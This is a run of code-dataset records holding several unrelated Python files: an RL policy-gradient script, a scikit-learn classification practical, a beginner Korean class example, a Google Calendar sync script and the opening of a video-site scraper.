+ r2\n return reward\n\n def reward_shaping_MountainCar(self, observation, next_observation, reward):\n position = observation[0]\n next_position, next_velocity = next_observation\n # the higher the better\n #reward = abs(position - (-0.5)) # r in [0, 1]\n #if position > -0.2: reward = 1\n if next_position > position: reward += 1\n if not hasattr(self, 'max_position'): self.max_position = next_position\n if next_position > self.max_position:\n reward += 2\n self.max_position = next_position\n print('Max position reached: {}'.format(next_position))\n return reward\n\n def resolved_CartPole(self, scores):\n if len(scores) >= 100 and np.mean(scores[-100:]) >= 195.0:\n print('Solved after {} episodes'.format(len(scores)-100))\n return True\n return False\n \n def resolved_MountainCar(self, scores):\n if len(scores) >= 10 and np.mean(scores[-10:]) >= -100:\n print('Solved after {} episodes'.format(len(scores)-10))\n return True\n return False\n\n def resolved_MountainCar(self, scores):\n if len(scores) >= 10 and np.mean(scores[-10:]) >= -100.0:\n print('Solved after {} episodes'.format(len(scores)-10))\n return True\n return False\n\n def run_one_episode(self, optimal = False, render = False):\n observation = self.env.reset()\n done = False\n num_steps = 0\n shaping_rewards = 0\n rewards = 0\n if self.agent.add_timestep_to_observation: observation = np.append(observation, num_steps)\n while not done:\n if render: self.env.render()\n action = self.agent.choose_action(observation, optimal)\n next_observation, reward, done, _ = self.env.step(action)\n shaping_reward = reward if not hasattr(self, 'reward_shaping') else self.reward_shaping(observation, next_observation, reward)\n if self.agent.add_timestep_to_observation: next_observation = np.append(next_observation, num_steps+1)\n if not optimal: self.agent.memorize(observation, action, next_observation, shaping_reward, done)\n observation = next_observation\n num_steps += 1\n rewards += reward\n shaping_rewards += shaping_reward\n return rewards, shaping_rewards, num_steps\n\n def run(self, episodes, optimal = False, render = False):\n print('start to run (optimal: {})...'.format(optimal))\n shaping_scores = []\n scores = []\n shaping_scores = []\n for episode in range(episodes):\n self.agent.new_episode()\n rewards, shaping_rewards, num_steps = self.run_one_episode(optimal, render)\n print('episode {}: steps {}, rewards: {}, shaping_rewards: {}, num_learns: {}'.format(episode, num_steps, rewards, shaping_rewards, self.agent.num_learns))\n scores.append(rewards)\n shaping_scores.append(shaping_rewards)\n if self.resolved(scores): break\n #if episode % 10 == 0:\n # plt.plot(self.agent.loss_history)\n # plt.show()\n #if episode > 300: optimal = True\n #if rewards == 200: render = True\n plt.plot(scores)\n plt.plot(shaping_scores, 'r--')\n plt.show()\n pprint.pprint(self.agent.debug_rewards)\n\n\nif __name__ == '__main__':\n #game = Game('CartPole-v0')\n game = Game('MountainCar-v0')\n\n game.run(episodes = 10000)\n game.agent.save()\n #game.agent.load()\n #game.replay_buffer.show()\n #game.run(episodes = 1, optimal = True, render = True)\n game.env.close()\n print('done')\n","sub_path":"policy_gradient.py","file_name":"policy_gradient.py","file_ext":"py","file_size_in_byte":12926,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"114042901","text":"from sklearn.model_selection import train_test_split\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn.metrics import accuracy_score, r2_score, classification_report\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.feature_selection import SelectKBest, f_classif\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport time\nimport csv\n\n\n\n#This function takes in a list and a file to write to, writes list to file as a .csv file\ndef writeListToFile(list1, filename):\n with open(filename, 'w') as resultFile:\n wr = csv.writer(resultFile, dialect = 'excel')\n wr.writerow(list1)\n\n\n\n#Reading in the input files for the multiclass classification task\n\ndf_XM = pd.read_csv('multiclass/X.csv', header=None)\ndf_yM = pd.read_csv('multiclass/y.csv', header=None)\ndf_WaveM = pd.read_csv('multiclass/Wavelength.csv', header=None);\n\n#Reading in the input files for the binary classification task\n\ndf_XB = pd.read_csv('binary/binary/X.csv', header=None)\ndf_yB = pd.read_csv('binary/binary/y.csv', header=None)\ndf_WaveB = pd.read_csv('binary/binary/Wavelength.csv', header=None)\n\n#Reading in the input files for the solution classifcation tasks\ndf_FinalXB = pd.read_csv('binary/binary/XToClassify.csv')\ndf_FinalXM = pd.read_csv('multiclass/XtoClassify.csv')\n\nprint(\"Shape of y is: \", df_yB.shape)\n\n#Flattening the data recived from the y files in order to a compatiable shape for training\n\ndf_y_flatB = df_yB.values.flatten()\ndf_y_flatM = df_yM.values.flatten()\n\nprint(\"Shape of y ravel is: \", df_y_flatB)\n\n\n\n\nX_trainB, X_testB, y_trainB, y_testB = train_test_split(df_XB, df_y_flatB, test_size = 0.4, random_state = 30)\n\nX_trainM, X_testM, y_trainM, y_testM = train_test_split(df_XM, df_y_flatM, test_size = 0.4, random_state = 30)\n\n\n\n#Defining the lists that will be written to file, for each different function\n\nfitTimeListBinaryLog = []\npredictTimeListBinaryLog = []\nfitTimeListMultiLog = []\npredictTimeListMultiLog = []\n\nfitTimeListBinaryNN = []\npredictTimeListBinaryNN = []\nfitTimeListMultiNN = []\npredictTimeListMultiNN = []\n\nfitTimeListMultiNNtanh = []\npredictTimeListMultiNNtanh = []\nfitTimeListMultiNNlogistic = []\npredictTimeListMultiNNlogistic = []\nfitTimeListMultiNNidentity = []\npredictTimeListMultiNNidentity = []\n\nfitTimeListMultiNNsgd = []\npredictTimeListMultiNNsgd = []\nfitTimeListMultiNNlbfgs = []\npredictTimeListMultiNNlbfgs = []\n\n\nfitTimeListMultiNNlayers = []\npredictTimeListMultiNNlayers = []\n\nfitTimeListMultiNNFinal = []\npredictTimeListMultiNNFinal = []\n\n#Defining the lists for printing each of the Scores for each function into a csv file.\nbinaryLogScore = []\nmultiLogScore = []\nbinaryNNScore = []\nmultiNNScore = []\nmultiNNtanhScore = []\nmultiNNlogisticScore = []\nmultiNNidentityScore = []\nmultiNNsgdScore = []\nmultiNNlbfgsScore = []\nmultiNNlayers = []\nmultiNNFinal = []\n\n#Defining the variabels to store the average score of each of the functions \naverageBLS = 0\naverageMLS = 0\naverageBNS = 0\naverageMNS = 0\naveragetanh = 0\naveragelogistic = 0\naverageidentity = 0\naveragesgd = 0\naveragelbfgs = 0\naveragelayers = 0\naverageFinal = 0\n\n\n\n#This function runs logistic regression on the binary data\ndef binaryLog(X_trainB, X_testB,y_trainB,y_testB,i):\n selectorB = SelectKBest(f_classif, k=i).fit(X_trainB, y_trainB)\n X_bestB = selectorB.transform(X_trainB)\n X_testBestB = selectorB.transform(X_testB)\n\n logreg = LogisticRegression()\n\n fitTime = time.clock()\n logreg.fit(X_bestB, y_trainB)\n fitTimeResult = time.clock() - fitTime\n fitTimeListBinaryLog.append(fitTimeResult)\n print(fitTimeResult)\n\n predictTime = time.clock()\n result = logreg.predict(X_testBestB)\n predictTimeResult = time.clock() - predictTime\n predictTimeListBinaryLog.append(predictTimeResult)\n print(predictTimeResult)\n print()\n\n score = accuracy_score(result,y_testB)\n binaryLogScore.append(score)\n print(\"SCORE IS: \", score)\n\n writeListToFile(fitTimeListBinaryLog, \"fitTimeBinaryLog.csv\")\n writeListToFile(predictTimeListBinaryLog, \"predictTimeBinaryLog.csv\")\n writeListToFile(binaryLogScore, \"binaryLogScore.csv\");\n\n return score;\n\n#This function runs logistic regression on the multiclass data\ndef multiLog(X_trainM, X_testM, y_trainM, y_testM,i):\n\n selectorM = SelectKBest(f_classif, k=i).fit(X_trainM, y_trainM)\n X_bestM = selectorM.transform(X_trainM)\n X_testBestM = selectorM.transform(X_testM)\n\n logregM = LogisticRegression()\n fitTime = time.clock()\n logregM.fit(X_bestM, y_trainM)\n fitTimeResult = time.clock() - fitTime\n fitTimeListMultiLog.append(fitTimeResult)\n print(fitTimeResult)\n\n predictTime = time.clock()\n resultM = logregM.predict(X_testBestM)\n predictTimeResult = time.clock() - predictTime\n predictTimeListMultiLog.append(predictTimeResult)\n print(predictTimeResult)\n print()\n\n score = accuracy_score(resultM, y_testM)\n multiLogScore.append(score)\n print(\"Score is: \", score)\n\n writeListToFile(fitTimeListMultiLog, \"fitTimeMultiLog.csv\")\n writeListToFile(predictTimeListMultiLog, \"predictTimeMultiLog.csv\")\n writeListToFile(multiLogScore, \"multiLogScore.csv\")\n\n return score;\n\n#This functions runs a Neural Network on the binary data\ndef binaryNN(X_trainB, X_testB,y_trainB,y_testB,i):\n\n \n selectorB = SelectKBest(f_classif, k=i).fit(X_trainB, y_trainB)\n X_bestB = selectorB.transform(X_trainB)\n X_testBestB = selectorB.transform(X_testB)\n\n clf = MLPClassifier(activation='relu', solver='lbfgs', alpha=0.0001, hidden_layer_sizes=(64), random_state = 10)\n\n\n fitTime = time.clock()\n clf.fit(X_bestB, y_trainB)\n fitTimeResult = time.clock() - fitTime\n fitTimeListBinaryNN.append(fitTimeResult)\n print(fitTimeResult)\n print()\n\n predictTime = time.clock()\n resultNNB = clf.predict(X_testBestB)\n predictTimeResult = time.clock() - predictTime\n predictTimeListBinaryNN.append(predictTimeResult)\n print(predictTimeResult)\n print()\n\n score = accuracy_score(resultNNB, y_testB)\n binaryNNScore.append(score)\n print(\"Score is: \", score)\n\n writeListToFile(fitTimeListBinaryNN, \"fitTimeBinaryNN.csv\")\n writeListToFile(predictTimeListBinaryNN, \"predictTimeBinaryNN.csv\")\n writeListToFile(binaryNNScore, \"binaryNNScore.csv\")\n\n return score;\n\n\n#This function runs a Nerual Network on the multiclass data\ndef multiNN(X_trainM, X_testM, y_trainM, y_testM,i):\n\n selectorM = SelectKBest(f_classif, k=i).fit(X_trainM, y_trainM)\n X_bestM = selectorM.transform(X_trainM)\n X_testBestM = selectorM.transform(X_testM)\n\n\n clf = MLPClassifier(activation='relu', solver='adam', alpha=0.0001, hidden_layer_sizes=(64), random_state = 10)\n\n fitTime = time.clock()\n clf.fit(X_bestM, y_trainM)\n fitTimeResult = time.clock() - fitTime\n fitTimeListMultiNN.append(fitTimeResult)\n print(fitTimeResult)\n print()\n\n predictTime = time.clock()\n resultNNM = clf.predict(X_testBestM)\n predictTimeResult = time.clock() - predictTime\n predictTimeListMultiNN.append(predictTimeResult)\n print(predictTimeResult)\n print()\n\n score = accuracy_score(resultNNM, y_testM)\n multiNNScore.append(score)\n print(\"Score is: \", score)\n\n writeListToFile(fitTimeListMultiNN, \"fitTimeMultiNN.csv\");\n writeListToFile(predictTimeListMultiNN, \"predictTimeMultiNN.csv\")\n writeListToFile(multiNNScore, \"multiNNScore.csv\");\n\n return score;\n\n\n#This function runs a Neural Network on the multiclass data using the tanh activation function\ndef multitanhNN(X_trainM, X_testM, y_trainM, y_testM,i):\n selectorM = SelectKBest(f_classif, k=i).fit(X_trainM, y_trainM)\n X_bestM = selectorM.transform(X_trainM)\n X_testBestM = selectorM.transform(X_testM)\n\n\n clf = MLPClassifier(activation='tanh', solver='adam', alpha=0.0001, hidden_layer_sizes=(64), random_state = 10)\n\n fitTime = time.clock()\n clf.fit(X_bestM, y_trainM)\n fitTimeResult = time.clock() - fitTime\n fitTimeListMultiNNtanh.append(fitTimeResult)\n print(fitTimeResult)\n print()\n\n predictTime = time.clock()\n resultNNM = clf.predict(X_testBestM)\n predictTimeResult = time.clock() - predictTime\n predictTimeListMultiNNtanh.append(predictTimeResult)\n print(predictTimeResult)\n print()\n\n score = accuracy_score(resultNNM, y_testM)\n multiNNtanhScore.append(score)\n print(\"Score is: \", score)\n\n writeListToFile(fitTimeListMultiNNtanh, \"fitTimeMultiNNtanh.csv\");\n writeListToFile(predictTimeListMultiNNtanh, \"predictTimeMultiNNtanh.csv\")\n writeListToFile(multiNNtanhScore, \"multiNNtanhScore.csv\");\n\n return score\n\n\n#This function runs a Neural Network on the multiclass data using the tanh logistic function\ndef multilogisticNN(X_trainM, X_testM, y_trainM, y_testM,i):\n\n selectorM = SelectKBest(f_classif, k=i).fit(X_trainM, y_trainM)\n X_bestM = selectorM.transform(X_trainM)\n X_testBestM = selectorM.transform(X_testM)\n\n\n clf = MLPClassifier(activation='logistic', solver='adam', alpha=0.0001, hidden_layer_sizes=(64), random_state = 10)\n\n fitTime = time.clock()\n clf.fit(X_bestM, y_trainM)\n fitTimeResult = time.clock() - fitTime\n fitTimeListMultiNNlogistic.append(fitTimeResult)\n print(fitTimeResult)\n print()\n\n predictTime = time.clock()\n resultNNM = clf.predict(X_testBestM)\n predictTimeResult = time.clock() - predictTime\n predictTimeListMultiNNlogistic.append(predictTimeResult)\n print(predictTimeResult)\n print()\n\n score = accuracy_score(resultNNM, y_testM)\n multiNNlogisticScore.append(score)\n print(\"Score is: \", score)\n\n writeListToFile(fitTimeListMultiNNlogistic, \"fitTimeMultiNNlogistic.csv\");\n writeListToFile(predictTimeListMultiNNlogistic, \"predictTimeMultiNNlogistic.csv\")\n writeListToFile(multiNNlogisticScore, \"multiNNlogisticScore.csv\");\n\n return score\n\n\n#This function runs a Neural Network on the multiclass data using the identity activation function\ndef multiidentityNN(X_trainM, X_testM, y_trainM, y_testM,i):\n selectorM = SelectKBest(f_classif, k=i).fit(X_trainM, y_trainM)\n X_bestM = selectorM.transform(X_trainM)\n X_testBestM = selectorM.transform(X_testM)\n\n\n clf = MLPClassifier(activation='identity', solver='adam', alpha=0.0001, hidden_layer_sizes=(64), random_state = 10)\n\n fitTime = time.clock()\n clf.fit(X_bestM, y_trainM)\n fitTimeResult = time.clock() - fitTime\n fitTimeListMultiNNidentity.append(fitTimeResult)\n print(fitTimeResult)\n print()\n\n predictTime = time.clock()\n resultNNM = clf.predict(X_testBestM)\n predictTimeResult = time.clock() - predictTime\n predictTimeListMultiNNidentity.append(predictTimeResult)\n print(predictTimeResult)\n print()\n\n score = accuracy_score(resultNNM, y_testM)\n multiNNidentityScore.append(score)\n print(\"Score is: \", score)\n\n writeListToFile(fitTimeListMultiNNidentity, \"fitTimeMultiNNidentity.csv\");\n writeListToFile(predictTimeListMultiNNidentity, \"predictTimeMultiNNidentity.csv\")\n writeListToFile(multiNNidentityScore, \"multiNNidentityScore.csv\");\n\n\n return score\n\n#This function runs a Neural Network on the multiclass data using the sgd solver \ndef multisgdNN(X_trainM, X_testM, y_trainM, y_testM,i):\n\n selectorM = SelectKBest(f_classif, k=i).fit(X_trainM, y_trainM)\n X_bestM = selectorM.transform(X_trainM)\n X_testBestM = selectorM.transform(X_testM)\n\n\n clf = MLPClassifier(activation='relu', solver='sgd', alpha=0.0001, hidden_layer_sizes=(64), random_state = 10)\n\n fitTime = time.clock()\n clf.fit(X_bestM, y_trainM)\n fitTimeResult = time.clock() - fitTime\n fitTimeListMultiNNsgd.append(fitTimeResult)\n print(fitTimeResult)\n print()\n\n predictTime = time.clock()\n resultNNM = clf.predict(X_testBestM)\n predictTimeResult = time.clock() - predictTime\n predictTimeListMultiNNsgd.append(predictTimeResult)\n print(predictTimeResult)\n print()\n\n score = accuracy_score(resultNNM, y_testM)\n multiNNsgdScore.append(score)\n print(\"Score is: \", score)\n\n writeListToFile(fitTimeListMultiNNsgd, \"fitTimeMultiNNsgd.csv\");\n writeListToFile(predictTimeListMultiNNsgd, \"predictTimeMultiNNsgd.csv\")\n writeListToFile(multiNNsgdScore, \"multiNNsgdScore.csv\");\n\n\n return score\n\n#This function runs a Neural Network on the multiclass data using the lbfgs solver\ndef multilbfgsNN(X_trainM, X_testM, y_trainM, y_testM,i):\n selectorM = SelectKBest(f_classif, k=i).fit(X_trainM, y_trainM)\n X_bestM = selectorM.transform(X_trainM)\n X_testBestM = selectorM.transform(X_testM)\n\n\n clf = MLPClassifier(activation='relu', solver='lbfgs', alpha=0.0001, hidden_layer_sizes=(64), random_state = 10)\n\n fitTime = time.clock()\n clf.fit(X_bestM, y_trainM)\n fitTimeResult = time.clock() - fitTime\n fitTimeListMultiNNlbfgs.append(fitTimeResult)\n print(fitTimeResult)\n print()\n\n predictTime = time.clock()\n resultNNM = clf.predict(X_testBestM)\n predictTimeResult = time.clock() - predictTime\n predictTimeListMultiNNlbfgs.append(predictTimeResult)\n print(predictTimeResult)\n print()\n\n score = accuracy_score(resultNNM, y_testM)\n multiNNlbfgsScore.append(score)\n print(\"Score is: \", score)\n\n writeListToFile(fitTimeListMultiNNlbfgs, \"fitTimeMultiNNlbfgs.csv\");\n writeListToFile(predictTimeListMultiNNlbfgs, \"predictTimeMultiNNlbfgs.csv\")\n writeListToFile(multiNNlbfgsScore, \"multiNNlbfgsScore.csv\");\n\n return score\n\n#This function runs a Neural Network on the multiclass data using a higher amount of layers and dpeth of layers\ndef nnLayersCompare(X_trainM, X_testM, y_trainM, y_testM,i):\n\n selectorM = SelectKBest(f_classif, k=i).fit(X_trainM, y_trainM)\n X_bestM = selectorM.transform(X_trainM)\n X_testBestM = selectorM.transform(X_testM)\n\n\n clf = MLPClassifier(activation='relu', solver='adam', alpha=0.0001, hidden_layer_sizes=(128,128,128,128), random_state = 10)\n\n fitTime = time.clock()\n clf.fit(X_bestM, y_trainM)\n fitTimeResult = time.clock() - fitTime\n fitTimeListMultiNNlayers.append(fitTimeResult)\n print(fitTimeResult)\n print()\n\n predictTime = time.clock()\n resultNNM = clf.predict(X_testBestM)\n predictTimeResult = time.clock() - predictTime\n predictTimeListMultiNNlayers.append(predictTimeResult)\n print(predictTimeResult)\n print()\n\n score = accuracy_score(resultNNM, y_testM)\n multiNNlayers.append(score)\n print(\"Score is: \", score)\n\n writeListToFile(fitTimeListMultiNNlayers, \"fitTimeMultiNNlayers.csv\");\n writeListToFile(predictTimeListMultiNNlayers, \"predictTimeMultiNNlayers.csv\")\n writeListToFile(multiNNlayers, \"multiNNlayersScore.csv\");\n\n return score\n\n\n#This function runs a Neural Network on the multiclass data using the best settings, which were chosen through the results of the above functions\ndef nnFinal(X_trainM, X_testM, y_trainM, y_testM,i):\n selectorM = SelectKBest(f_classif, k=i).fit(X_trainM, y_trainM)\n X_bestM = selectorM.transform(X_trainM)\n X_testBestM = selectorM.transform(X_testM)\n\n\n clf = MLPClassifier(activation='tanh', solver='adam', alpha=0.0001, hidden_layer_sizes=(128,128,128,128), random_state = 10)\n\n fitTime = time.clock()\n clf.fit(X_bestM, y_trainM)\n fitTimeResult = time.clock() - fitTime\n fitTimeListMultiNNFinal.append(fitTimeResult)\n print(fitTimeResult)\n print()\n\n predictTime = time.clock()\n resultNNM = clf.predict(X_testBestM)\n predictTimeResult = time.clock() - predictTime\n predictTimeListMultiNNFinal.append(predictTimeResult)\n print(predictTimeResult)\n print()\n\n score = accuracy_score(resultNNM, y_testM)\n multiNNFinal.append(score)\n print(\"Score is: \", score)\n\n writeListToFile(fitTimeListMultiNNFinal, \"fitTimeMultiNNFinal.csv\");\n writeListToFile(predictTimeListMultiNNFinal, \"predictTimeMultiNNFinal.csv\")\n writeListToFile(multiNNFinal, \"multiNNFinalScore.csv\");\n\n return score\n\n#This functions prints out to file the final solution to the data provided for the binary class.\ndef binarySolution(X_trainB, df_FinalXB ,y_trainB):\n selectorB = SelectKBest(f_classif, k=1).fit(X_trainB, y_trainB)\n X_bestB = selectorB.transform(X_trainB)\n X_testBestB = selectorB.transform(df_FinalXB)\n\n logreg = LogisticRegression()\n\n logreg.fit(X_bestB, y_trainB)\n \n result = logreg.predict(X_testBestB)\n \n print(result)\n\n writeListToFile(result, \"binaryTask/PredictedClasses.csv\");\n\n#This function prints out to the file the final solution to the data provided for the multiclass.\ndef multiSolution(X_trainM, df_FinalXM ,y_trainM):\n selectorM = SelectKBest(f_classif, k=10).fit(X_trainM, y_trainM)\n X_bestM = selectorM.transform(X_trainM)\n X_testBestM = selectorM.transform(df_FinalXM)\n\n logreg = LogisticRegression()\n\n logreg.fit(X_bestM, y_trainM)\n\n result = logreg.predict(X_testBestM)\n \n print(result)\n\n writeListToFile(result, \"multiClassTask/PredictedClasses.csv\");\n\n\n\n\n#Loop running over the main section of the program, i indicates the number of features that function will run on\nfor i in range(1,921):\n print(i) \n # averageBLS += binaryLog(X_trainB, X_testB,y_trainB,y_testB,i)\n # averageMLS += multiLog(X_trainM, X_testM, y_trainM, y_testM,i)\n # averageBNS += binaryNN(X_trainB, X_testB,y_trainB,y_testB,i)\n # averageMNS += multiNN(X_trainM, X_testM, y_trainM, y_testM,i)\n #averagetanh += multitanhNN(X_trainM, X_testM, y_trainM, y_testM,i)\n # averagelogistic += multilogisticNN(X_trainM, X_testM, y_trainM, y_testM,i)\n #averageidentity += multiidentityNN(X_trainM, X_testM, y_trainM, y_testM,i)\n # averagesgd += multisgdNN(X_trainM, X_testM, y_trainM, y_testM,i)\n # averagelbfgs += multilbfgsNN(X_trainM, X_testM, y_trainM, y_testM,i)\n # averagelayers += nnLayersCompare(X_trainM, X_testM, y_trainM, y_testM,i)\n # averageFinal += nnFinal(X_trainM, X_testM, y_trainM, y_testM,i)\n\nbinarySolution(X_trainB, df_FinalXB ,y_trainB)\nmultiSolution(X_trainM, df_FinalXM ,y_trainM)\n\n\n\n#Printing out the average score for each of the functions.\nprint(\"The average score for binaryLog was: \", averageBLS/921)\nprint(\"The average score for multiLog was: \", averageMLS/921)\nprint(\"The average score for the binaryNN was: \", averageBNS/921)\nprint(\"The average score for the multiNN was: \", averageMNS/921)\nprint(\"The average score for the multitanhNN was: \", averagetanh/921)\nprint(\"The average score for the multilogisticNN was: \", averagelogistic/921)\nprint(\"The average score for the multiidentityNN was: \", averageidentity/921)\nprint(\"The average score for the multisgdNN was: \", averagesgd/921)\nprint(\"The average score for the multilbfgsNN was: \", averagelbfgs/921)\nprint(\"The average score for the multiLayers was: \", averagelayers/921)\nprint(\"The average score for the Final NN was: \", averageFinal/921)\n\n\n\n#Plotting of training data visulising the data to show cross overs in validation categories\n\n\n\nfig, ax = plt.subplots()\n\n\n\n\n#for i in range(len(X_trainM)):\n # if y_trainM[i] == 0:\n # ax.scatter(df_WaveM,X_trainM.iloc[i,:], s=1, c='b')\n # elif y_trainM[i] == 1:\n # ax.scatter(df_WaveM,X_trainM.iloc[i,:], s=1, c='g')\n # elif y_trainM[i] == 2:\n # ax.scatter(df_WaveM,X_trainM.iloc[i,:], s=1, c='m')\n # elif y_trainM[i] == 3:\n # ax.scatter(df_WaveM,X_trainM.iloc[i,:], s=1, c='r')\n # elif y_trainM[i] == 4:\n # ax.scatter(df_WaveM,X_trainM.iloc[i,:], s=1, c='y')\n\n\nfor i in range(len(X_trainB)):\n if y_trainB[i] == 0:\n ax.scatter(df_WaveB,X_trainB.iloc[i,:], s=1, c='g')\n elif y_trainB[i] == 1:\n ax.scatter(df_WaveM,X_trainB.iloc[i,:], s=1, c='r')\n\n\n\n\n\n\n\nplt.show()\n\n\n\n\n","sub_path":"Machine Learning Classification (2017-2018)/practical2.py","file_name":"practical2.py","file_ext":"py","file_size_in_byte":19615,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"592975421","text":"class Car:\n # #인스턴스 변수\n # color = \"\"\n # speed = 0\n car_count = 0\n\n def __init__(self,color,speed):\n self.color = color\n self.speed = speed\n Car.car_count += 1\n\n def __del__(self):\n Car.car_count -= 1\n\n def upSpeed(self, value):\n self.speed += value\n \n def downSpeed(self, value):\n self.speed -= value\n\n#객체 생성\nmyCar1 = Car(\"Red\",30)\n\nmyCar2 = Car(\"Blue\",20)\n\nmyCar3 = Car(\"Black\",50)\n\nmyCar1.upSpeed(20)\nprint(\"자동차1의 색상은 {}이며 현재 속도는 {:3d}km\".format(myCar1.color,myCar1.speed))\nmyCar2.upSpeed(10)\nprint(\"자동차2의 색상은 {}이며 현재 속도는 {:3d}km\".format(myCar2.color,myCar2.speed))\nmyCar3.upSpeed(30)\nprint(\"자동차3의 색상은 {}이며 현재 속도는 {:3d}km\".format(myCar3.color,myCar3.speed))\n\nprint()\nprint(\"myCar1 주소 : \",id(myCar1))\nprint(\"myCar2 주소 : \",id(myCar2))\nprint(\"myCar3 주소 : \",id(myCar3))\n\n\nprint()\nprint(\"생상된 총 자동차 수 : {}\".format(Car.car_count))","sub_path":"class/car4.py","file_name":"car4.py","file_ext":"py","file_size_in_byte":1026,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"394339539","text":"import httplib2\nimport datetime\nimport os\nimport googleapiclient.discovery as discovery\nfrom oauth2client.client import flow_from_clientsecrets\nfrom oauth2client.file import Storage\nfrom oauth2client.tools import run_flow\n\nos.chdir(\"D:/workspace/Google/\")\nCLIENT_SECRET = 'client_secret.json'\nSCOPE = 'https://www.googleapis.com/auth/calendar'\nSTORAGE = Storage('credentials.storage')\nMY_CALENDAR_ID = \"limbc122@gmail.com\"\nSHARE_CALENDAR_ID = \"nisd7q1snk190j67v22uvq43c0@group.calendar.google.com\"\n\n# Start the OAuth flow to retrieve credentials\ndef authorize_credentials():\n # Fetch credentials from storage\n credentials = STORAGE.get()\n\n # If the credentials doesn't exist in the storage location then run the flow\n if credentials is None or credentials.invalid:\n flow = flow_from_clientsecrets(CLIENT_SECRET, scope=SCOPE)\n http = httplib2.Http()\n credentials = run_flow(flow, STORAGE, http=http)\n return credentials\n\ndef get_calendars(service):\n calendar_list = service.calendarList().list().execute()\n return calendar_list['items']\n\ndef get_calendar(service, calendar_id):\n for calendar in get_calendars(service):\n if calendar.get(\"id\") == calendar_id:\n return calendar\n\ndef get_events(service, calendar_id, start, end):\n eventsResult = service.events().list(\n calendarId=calendar_id,\n timeMin=start,\n timeMax=end,\n timeZone=\"Asia/Seoul\",\n singleEvents=True,\n orderBy='startTime').execute()\n return eventsResult.get('items', [])\n\ndef insert_event(service, calendar_id, event_name, start, end):\n body = {\n 'summary': event_name,\n 'description': event_name,\n 'start': {\n 'date': start,\n 'timeZone': 'Asia/Seoul',\n },\n 'end': {\n 'date': end,\n 'timeZone': 'Asia/Seoul',\n },\n }\n\n return service.events().insert(calendarId=calendar_id, body=body).execute()\n\ndef delete_event(service, calendar_id, event_id):\n return service.events().delete(calendarId=calendar_id, eventId=event_id).execute()\n\n# Connect Google\ncredentials = authorize_credentials()\nhttp = credentials.authorize(httplib2.Http())\nservice = discovery.build('calendar', 'v3', http=http)\nfor calendar in get_calendars(service):\n if calendar.get(\"summary\").strip() == \"2019년 매매데이터팀 당번\":\n SHARE_CALENDAR_ID = calendar.get(\"id\")\n break\n\n# Set date\nKST = datetime.timezone(datetime.timedelta(hours=9))\n# start = datetime.datetime(2019, 6, 1, 0, 0, 0, tzinfo=KST)\n# end = datetime.datetime(2019, 12, 31, 23, 59, 59, tzinfo=KST)\n\nmonths = [datetime.date(2019, m, 1) for m in range(7, 13)]\nfor month in months:\n print(\"< {} >\".format(month.strftime('%B')))\n start = datetime.datetime(month.year, month.month, 1, 0, 0, 0, tzinfo=KST)\n end = start + datetime.timedelta(days=31)\n\n # Get Shared Calendar\n print(\"## Get Shared Calendar\")\n events_share = get_events(service, SHARE_CALENDAR_ID, start.isoformat(), end.isoformat())\n events_share = [ event for event in events_share if \"임병천\" in event.get(\"summary\") ]\n\n # Get My Calendar\n print(\"## Get My Calendar\")\n my_events = get_events(service, MY_CALENDAR_ID, start.isoformat(), end.isoformat())\n my_events = [ event for event in my_events if \"임병천\" in event.get(\"summary\")]\n\n # Find event to Add\n print(\"## Find event to Insert\")\n for event in events_share:\n # print(\"# Date : {}\".format(event[\"start\"][\"dateTime\"][:10]))\n # print(\"# Event : {}\".format(event[\"summary\"].strip()))\n\n target_events = [\n my_event\n for my_event in my_events\n if event[\"start\"][\"dateTime\"][:10] == my_event[\"start\"][\"date\"]\n and event[\"summary\"].strip() == my_event[\"summary\"].strip()\n ]\n\n if len(target_events) > 1:\n print(\"!!! Check Target Events\")\n break\n elif len(target_events) == 1:\n pass\n else:\n print(\"# Start : {}\\n# End : {}\\n# Event : <{}>\".format(event[\"start\"][\"dateTime\"], event[\"end\"][\"dateTime\"], event[\"summary\"].strip()))\n print(\"=> Insert Event\")\n insert_event(service, MY_CALENDAR_ID, event.get(\"summary\").strip(), event.get(\"start\").get(\"dateTime\")[:10], event.get(\"end\").get(\"dateTime\")[:10])\n\n # Find event to Delete\n print(\"## Find event to Delete\")\n for event in my_events:\n # print(\"# Date : {}\".format(event[\"start\"][\"dateTime\"][:10]))\n # print(\"# Event : {}\".format(event[\"summary\"].strip()))\n\n target_events = [\n share_event\n for share_event in events_share\n if event.get(\"start\").get(\"date\") == share_event[\"start\"][\"dateTime\"][:10]\n and event[\"summary\"].strip() == share_event[\"summary\"].strip()\n ]\n\n if len(target_events) > 1:\n print(\"!!! Check Target Events\")\n break\n elif len(target_events) == 1:\n # delete_event(service, MY_CALENDAR_ID, event[\"id\"]) # for refresh\n pass\n else:\n print(\"# Start : {}\\n# End : {}\\n# Event : <{}>\".format(event[\"start\"][\"date\"], event[\"end\"][\"date\"], event[\"summary\"].strip()))\n print(\"=> Delete Event\")\n delete_event(service, MY_CALENDAR_ID, event[\"id\"])\n\nprint(\"## Finished\")\n\n","sub_path":"calendar_sync.py","file_name":"calendar_sync.py","file_ext":"py","file_size_in_byte":5364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"444605618","text":"from JavPy.sources.BaseSource import ISearchByCode\nimport bs4\nfrom JavPy.functions.datastructure import AV\nfrom JavPy.utils.config import proxy\nimport cloudscraper\n\n\nclass JavFullNet(ISearchByCode):\n __client = cloudscraper.create_scraper()\n\n @classmethod\n def search_by_code(mcs, code):\n url = \"https://javfull.net/?s=\" + code\n html = mcs.__client.get(url, proxies=proxy).text\n bs = bs4.BeautifulSoup(html, \"lxml\")\n item = bs.select(\".item\")[0]\n\n av = AV()\n av.code = code\n av.preview_img_url = item.find(name=\"img\").attrs[\"src\"]\n av.video_url = item.find(name=\"a\").attrs[\"href\"]\n\n return av\n\n @classmethod\n def test(mcs):\n mcs.test_search_by_code(\"n1056\")\n\n\nif __name__ == \"__main__\":\n 